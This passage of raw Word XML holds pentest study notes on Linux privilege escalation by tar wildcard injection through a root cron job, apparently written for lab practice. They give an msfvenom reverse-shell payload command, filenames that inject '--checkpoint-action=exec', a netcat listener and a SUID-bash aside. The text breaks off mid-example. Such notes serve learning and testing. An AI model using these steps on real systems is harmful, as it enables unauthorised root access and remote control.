          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">echo *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002562">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002563">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Wildcards &amp; Filenames</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002564">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since filesystems in Linux are generally very permissive with filenames, and filename expansion happens before the command is executed, it is possible to pass command line options (e.g. -h, --help) to commands by creating files with these names.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002565">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The following commands should show how this works:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002566">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1117"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ ls *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002567">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1117"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">% touch ./-l</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002568">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1117"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ ls *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002569">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000256A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="942"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Filenames are not simply restricted to simple options like -h or --help.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000256B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="942"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In fact we can create filenames that match complex options: --option=key=value</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000256C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="942"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBins (https://gtfobins.github.io) can help determine whether a command has command line options which will be useful for our purposes</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000256D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000256E">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to exploit:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000256F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View the contents of the system-wide crontab</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002570">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="990600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="143" name="image149.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image149.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId791"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59436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2571">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">View the contents of the /usr/local/bin/compress.sh file</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002572">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ cat /usr/local/bin/compress.sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002573">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">#!/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002574">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /home/user</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002575">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">tar czf /tmp/backup.tar.gz *</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002576">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">GTFOBins shows that tar has command line options which can be used to run other commands as part of a checkpoint feature</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002577">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4329113" cy="950462"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="105" name="image101.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image101.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId792"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4329113" cy="95046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578">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Use msfvenom to create a reverse shell ELF payload</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002579">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">msfvenom -p linux/x64/shell_reverse_tcp LHOST=&lt;IP&gt; LPORT=53 -f elf -o shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000257A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Go to the directory where the cron job is running the tar command</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000257B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">cd /home/user</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000257C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Copy the file to the /home/user directory on the remote host and make it executable</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000257D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">chmod +x shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000257E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create two files in the /home/user directory (or wherever your cron job is running tar)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000257F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For XXXXXXXXX-C .157, this didn't work for me, so I made /bin/bash have SUID instead to login as root. You can look at "Example1 of Bash Gobbling or Linux tar wildcard" for more details</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002580">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch ./--checkpoint=1</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002581">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">touch ./--checkpoint-action=exec=shell.elf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002582">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">For files starting with "-" in its name, you need to add ./ at the start</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002583">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Run a netcat listener on your local machine and wait for the cron job to run. A reverse shell running as the root user should be caught:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002584">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="749"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1435100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="295" name="image289.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image289.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId793"/>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2585">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002586">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002587">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_ym8t2grxevp6" w:id="327"/>
      <w:bookmarkEnd w:id="327"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Example1 of Bash Gobbling or Linux tar wildcard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002588">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">From </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">XXXXXXXXX-C .157 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for priv esc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002589">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000258A">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Now, for priv esc, we are supposed to run pspy64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000258B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1200"/>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854200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="44" name="image48.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image48.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId794"/>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258C">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We see mentions of CRON and we see tar with the * symbol which makes us think of Bash Gobbling also known as Linux tar wildcard.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000258D">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I looked in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> /etc/crontab</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and found nothing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000258E">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We can further inspect cron.d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000258F">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cd /etc/cron.d</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002590">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ls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00002591">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I see a file called 2minutes and it has the tar command! We also saw "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">e2scrub_all</w:t>
      </w:r>
